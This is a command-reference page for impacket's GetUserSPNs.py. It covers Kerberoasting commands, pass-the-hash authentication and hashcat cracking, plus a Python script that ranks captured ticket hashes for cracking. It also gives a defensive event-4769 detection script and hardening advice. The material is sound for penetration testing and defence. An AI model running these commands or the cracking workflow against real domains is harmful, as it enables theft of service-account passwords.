LinuxCommandLibrary

getuserspns.py

Enumerate Service Principal Names (SPNs)

TLDR

Enumerate enabled user accounts that have an SPN set (the Kerberoastable accounts)
$ GetUserSPNs.py [domain]/[username]:[password] -dc-ip [domain_controller_ip]

Authenticate with an NTLM hash instead of a password (pass-the-hash)
$ GetUserSPNs.py [domain]/[username] -hashes [LM_Hash]:[NT_Hash] -dc-ip [domain_controller_ip]

Request a service ticket (TGS) for every account found and write the tickets to a file in John/hashcat format
$ GetUserSPNs.py [domain]/[username]:[password] -dc-ip [domain_controller_ip] -request -outputfile [output_file]

List the accounts and also request their TGS tickets, printed to the terminal in John/hashcat format
$ GetUserSPNs.py [domain]/[username]:[password] -dc-ip [domain_controller_ip] -request

Request the TGS tickets using pass-the-hash authentication
$ GetUserSPNs.py [domain]/[username] -dc-ip [domain_controller_ip] -hashes [LM_Hash]:[NT_Hash] -request

SYNOPSIS

GetUserSPNs.py [-request] [-request-user username] [-save] [-outputfile file] [-usersfile file] [-target-domain domain] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex_key] [-dc-ip ip_address] [-dc-host hostname] [-debug] domain/username[:password]

PARAMETERS

domain/username[:password]
    The account used to authenticate to the domain, given as a single positional argument rather than separate user and password switches. If the password is omitted and none of -hashes, -aesKey or -no-pass is given, the script prompts for it.

-request
    After listing the accounts, request a TGS for each one and print the tickets in John the Ripper/hashcat format. This is the option that performs the Kerberoasting step; without it the script only reads LDAP.

-request-user username
    Request a TGS only for the SPN owned by the named account (the username alone, no domain).

-save
    Save each requested ticket to disk as <username>.ccache. Implies -request.

-outputfile file
    Write the requested tickets to this file in the same John/hashcat format instead of printing them.

-usersfile file
    Read account names from a file, one per line, and request tickets for those accounts instead of searching LDAP for SPNs.

-target-domain domain
    Query a different (trusted) domain than the one the authenticating account belongs to, for Kerberoasting across trusts.

-hashes LMHASH:NTHASH
    Authenticate with NTLM hashes instead of a cleartext password (pass-the-hash). The LM half is usually the empty-password value aad3b435b51404eeaad3b435b51404ee.

-no-pass
    Do not prompt for a password (useful together with -k).

-k
    Use Kerberos authentication with the credentials in the ccache file named by KRB5CCNAME, falling back to the credentials given on the command line.

-aesKey hex_key
    Authenticate with a Kerberos AES key (128 or 256 bits) instead of a password.

-dc-ip ip_address
    IP address of the domain controller. If omitted, the domain part of the target argument is resolved and used; ignored when -target-domain is given.

-dc-host hostname
    Hostname of the domain controller to use.

-debug
    Turn on debug output.

DESCRIPTION

GetUserSPNs.py is one of the example scripts shipped with the impacket library (some distributions install it as impacket-GetUserSPNs). It authenticates to a domain controller, queries LDAP for enabled user objects (not computer objects) whose servicePrincipalName attribute is populated, and prints each account's SPN, account name, group membership, password-last-set and last-logon timestamps.

These accounts matter because a Kerberos service ticket (TGS) for an SPN is encrypted with the key of the account that owns the SPN, and that key is derived from the account's password. Any authenticated domain user can ask the KDC for a TGS for any SPN, so an attacker holding one low-privilege account can collect a ticket for every user-owned SPN and try to recover the owners' passwords offline by guessing; this is Kerberoasting. Computer accounts also own SPNs, but their passwords are long and random, so the script excludes them and lists only user accounts, typically service accounts created by administrators, which often carry old or weak passwords and elevated group memberships. With -request the script performs the TGS requests itself and prints the tickets in John the Ripper/hashcat format (mode 13100 for RC4 tickets, 19600 and 19700 for AES128 and AES256).

The same listing is useful defensively: it shows exactly which accounts an attacker could Kerberoast, so they can be moved to group Managed Service Accounts, given long random passwords, stripped of unnecessary SPNs, or restricted to AES encryption.
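Once -request -outputfile has produced a file, the next practical question is which entries to crack first. The following is an added example, not part of GetUserSPNs.py or impacket: it parses the hash lines the script writes (RC4 lines look like $krb5tgs$23$*user$REALM$spn*$checksum$data, AES lines like $krb5tgs$18$user$REALM$*spn*$checksum$data), drops duplicate accounts, puts RC4 tickets first because they crack orders of magnitude faster, and groups the lines by hashcat mode. The sample lines are constructed with dummy hex, and the function and file names are the example's own.

```python
import re
from collections import defaultdict

# hashcat modes for the three ticket encryption types impacket emits
HASHCAT_MODES = {23: 13100, 17: 19600, 18: 19700}

# RC4 (etype 23): $krb5tgs$23$*user$REALM$spn*$checksum(16 bytes)$edata
RC4_LINE = re.compile(
    r"^\$krb5tgs\$(?P<etype>23)\$\*(?P<user>[^$]+)\$(?P<realm>[^$]+)\$(?P<spn>[^*]+)\*"
    r"\$(?P<checksum>[0-9a-f]{32})\$(?P<edata>[0-9a-f]+)$"
)
# AES (etype 17/18): $krb5tgs$18$user$REALM$*spn*$checksum(12 bytes)$edata
AES_LINE = re.compile(
    r"^\$krb5tgs\$(?P<etype>1[78])\$(?P<user>[^$]+)\$(?P<realm>[^$]+)\$\*(?P<spn>[^*]+)\*"
    r"\$(?P<checksum>[0-9a-f]{24})\$(?P<edata>[0-9a-f]+)$"
)

# Constructed sample of an -outputfile, plus one stray log line to show it is skipped.
# The hex is filler, not real ticket material.
SAMPLE_OUTPUT = """
$krb5tgs$23$*svc_sql$CORP.LOCAL$MSSQLSvc/sql01.corp.local~1433*$0123456789abcdef0123456789abcdef$00112233445566778899aabbccddeeff00112233445566778899aabbccddeeff
$krb5tgs$18$svc_backup$CORP.LOCAL$*backup/bkp01.corp.local*$0123456789abcdef01234567$ffeeddccbbaa99887766554433221100ffeeddccbbaa99887766554433221100
$krb5tgs$23$*svc_web$CORP.LOCAL$HTTP/web01.corp.local*$fedcba9876543210fedcba9876543210$aabbccddeeff00112233445566778899aabbccddeeff00112233445566778899
$krb5tgs$23$*svc_sql$CORP.LOCAL$MSSQLSvc/sql01.corp.local~1433*$0123456789abcdef0123456789abcdef$00112233445566778899aabbccddeeff00112233445566778899aabbccddeeff
[*] Getting TGT for svc_user
""".strip().splitlines()


def parse_line(line):
    """Return a dict for one GetUserSPNs.py hash line, or None if the line is not one."""
    line = line.strip()
    m = RC4_LINE.match(line) or AES_LINE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["etype"] = int(entry["etype"])
    entry["spn"] = entry["spn"].replace("~", ":")  # impacket writes ':' in the SPN as '~'
    entry["hashcat_mode"] = HASHCAT_MODES[entry["etype"]]
    entry["line"] = line
    return entry


def triage(lines):
    """Parse all lines, keep one entry per account, and order RC4 tickets first."""
    seen = set()
    entries = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        key = (entry["realm"].upper(), entry["user"].lower())
        if key in seen:
            continue
        seen.add(key)
        entries.append(entry)
    # etype 23 is the cheap one to attack, so it sorts before 17/18
    entries.sort(key=lambda e: (e["etype"] != 23, e["user"].lower()))
    return entries


def crack_plan(entries):
    """Group the raw hash lines by hashcat mode; each group goes into its own input file."""
    plan = defaultdict(list)
    for entry in entries:
        plan[entry["hashcat_mode"]].append(entry["line"])
    return dict(plan)


if __name__ == "__main__":
    ordered = triage(SAMPLE_OUTPUT)
    for e in ordered:
        print(f"{e['user']:<12} etype={e['etype']:<3} mode={e['hashcat_mode']}  {e['spn']}")
    for mode, hashes in crack_plan(ordered).items():
        print(f"hashcat -m {mode} <{len(hashes)} hashes> wordlist.txt")
```

Feeding each group to hashcat with the matching mode avoids the "no hashes loaded" failures you get when RC4 and AES lines are mixed in one file, and triaging by account stops you from spending GPU time on the same password twice.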

CAVEATS

The script needs valid credentials for any account in the domain (or in a trusted domain, with -target-domain); no special privileges are required, because listing SPNs over LDAP and requesting service tickets are ordinary operations for an authenticated user. It also needs network reachability to the domain controller (LDAP on 389, Kerberos on 88) and the impacket library.

Without -request the script only reads LDAP. With -request it asks the KDC for one ticket per account, and the domain controller logs each request as event 4769 (A Kerberos service ticket was requested). A burst of 4769 events from one account for many distinct user-owned SPNs, particularly with ticket encryption type 0x17 (RC4), is a widely deployed Kerberoasting detection, so expect the request step to be visible in a monitored environment.

Whether a ticket can be cracked depends on the service account's password and on the encryption type. For most user accounts the KDC issues an RC4-encrypted ticket (etype 23) when asked; if the account is restricted to AES, the ticket uses etype 17 or 18, which is far more expensive to attack. Defensively, give every account that must hold an SPN a long random password or make it a group Managed Service Account, remove SPNs from ordinary user accounts, and enable AES-only encryption for service accounts.
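The detection described above, as an added example that is not part of impacket or of this page's original content: it runs over constructed 4769 events (fields named as they appear in the Windows Security log export, times in UTC) and flags any requester and source IP that obtains RC4 service tickets for several distinct user-account SPNs inside a short window. Machine-account services (names ending in $) and krbtgt are ignored because they are not Kerberoasting targets. The window, threshold and function names are choices of the example.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed 4769 events, not real telemetry. jdoe pulls five RC4 tickets for
# user-account SPNs within seconds (GetUserSPNs.py -request behaviour); asmith
# makes two unrelated requests hours apart.
SAMPLE_4769 = [
    {"TimeCreated": "2024-03-01T09:00:01Z", "TargetUserName": "jdoe@CORP.LOCAL",
     "ServiceName": "FS01$", "TicketEncryptionType": "0x12", "IpAddress": "10.0.0.25"},
    {"TimeCreated": "2024-03-01T09:00:05Z", "TargetUserName": "jdoe@CORP.LOCAL",
     "ServiceName": "svc_sql", "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.25"},
    {"TimeCreated": "2024-03-01T09:00:05Z", "TargetUserName": "jdoe@CORP.LOCAL",
     "ServiceName": "svc_web", "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.25"},
    {"TimeCreated": "2024-03-01T09:00:06Z", "TargetUserName": "jdoe@CORP.LOCAL",
     "ServiceName": "svc_backup", "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.25"},
    {"TimeCreated": "2024-03-01T09:00:06Z", "TargetUserName": "jdoe@CORP.LOCAL",
     "ServiceName": "svc_ctx", "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.25"},
    {"TimeCreated": "2024-03-01T09:00:07Z", "TargetUserName": "jdoe@CORP.LOCAL",
     "ServiceName": "svc_sccm", "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.25"},
    {"TimeCreated": "2024-03-01T09:14:00Z", "TargetUserName": "asmith@CORP.LOCAL",
     "ServiceName": "svc_sql", "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.31"},
    {"TimeCreated": "2024-03-01T13:30:00Z", "TargetUserName": "asmith@CORP.LOCAL",
     "ServiceName": "svc_web", "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.31"},
]

WINDOW = timedelta(minutes=5)   # example choice: tune to the environment
THRESHOLD = 3                   # distinct user-account services per requester in one window


def is_user_service(service_name):
    # Machine accounts end in '$' and have random passwords; krbtgt is the TGT service itself.
    return not service_name.endswith("$") and service_name.lower() != "krbtgt"


def detect_kerberoasting(events, window=WINDOW, threshold=THRESHOLD):
    """Return one alert per (requester, IP) that gathered RC4 TGS tickets for many SPNs quickly."""
    by_requester = defaultdict(list)
    for ev in events:
        if ev["TicketEncryptionType"].lower() != "0x17":   # RC4 is the cheap-to-crack etype
            continue
        if not is_user_service(ev["ServiceName"]):
            continue
        ts = datetime.strptime(ev["TimeCreated"], "%Y-%m-%dT%H:%M:%SZ")
        by_requester[(ev["TargetUserName"], ev["IpAddress"])].append((ts, ev["ServiceName"]))

    alerts = []
    for (user, ip), reqs in by_requester.items():
        reqs.sort()
        best_services, best_start = set(), None
        # Slide a window starting at each request; keep the largest set of distinct services.
        for i, (start, _) in enumerate(reqs):
            in_window = {name for ts, name in reqs[i:] if ts - start <= window}
            if len(in_window) > len(best_services):
                best_services, best_start = in_window, start
        if len(best_services) >= threshold:
            alerts.append({
                "user": user,
                "ip": ip,
                "window_start": best_start.isoformat(),
                "services": sorted(best_services),
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_kerberoasting(SAMPLE_4769):
        print(f"{alert['user']} from {alert['ip']} requested RC4 tickets for "
              f"{len(alert['services'])} user-account SPNs starting {alert['window_start']}: "
              f"{', '.join(alert['services'])}")
```

The 0x17 filter is what keeps the false-positive rate low in an AES-enabled domain, but it also means an attacker who asks for AES tickets is missed; a second, noisier rule that drops the encryption-type check and raises the threshold covers that case. Legitimate applications that enumerate many services (monitoring, vulnerability scanners) will trip either rule and need an allow-list by requester.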

USAGE EXAMPLES

  • Enumerate SPNs using a username and password: GetUserSPNs.py corp.local/user1:Password123 -dc-ip 10.0.0.10
  • Enumerate SPNs using NTLM hashes: GetUserSPNs.py corp.local/user1 -hashes aad3b435b51404eeaad3b435b51404ee:<nt_hash> -dc-ip 10.0.0.10
  • Request tickets for the found SPNs and save them to a file for cracking: GetUserSPNs.py corp.local/user1:Password123 -dc-ip 10.0.0.10 -request -outputfile spns.txt
  • Request a ticket for a single account only: GetUserSPNs.py corp.local/user1:Password123 -dc-ip 10.0.0.10 -request-user svc_sql
  • Crack the saved RC4 tickets offline: hashcat -m 13100 spns.txt wordlist.txt

SEE ALSO
